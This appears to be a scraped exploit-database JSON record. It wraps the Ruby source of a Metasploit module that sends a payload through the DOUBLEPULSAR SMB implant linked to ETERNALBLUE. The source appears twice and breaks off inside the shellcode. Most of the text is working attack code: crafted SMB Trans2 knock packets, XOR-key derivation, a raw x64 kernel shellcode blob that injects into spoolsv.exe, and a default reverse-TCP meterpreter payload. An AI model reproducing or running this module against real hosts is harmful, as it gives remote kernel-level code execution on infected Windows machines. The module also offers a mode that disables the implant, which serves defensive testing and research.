pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-08] #"}, "lastseen": "2021-10-08T00:17:28", "differentElements": ["sourceData"], "edition": 38}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "a8858b4261ce0948fafb9db666ab4ced", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-08T22:18:55", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-08T00:17:28", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-08T00:17:28", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n 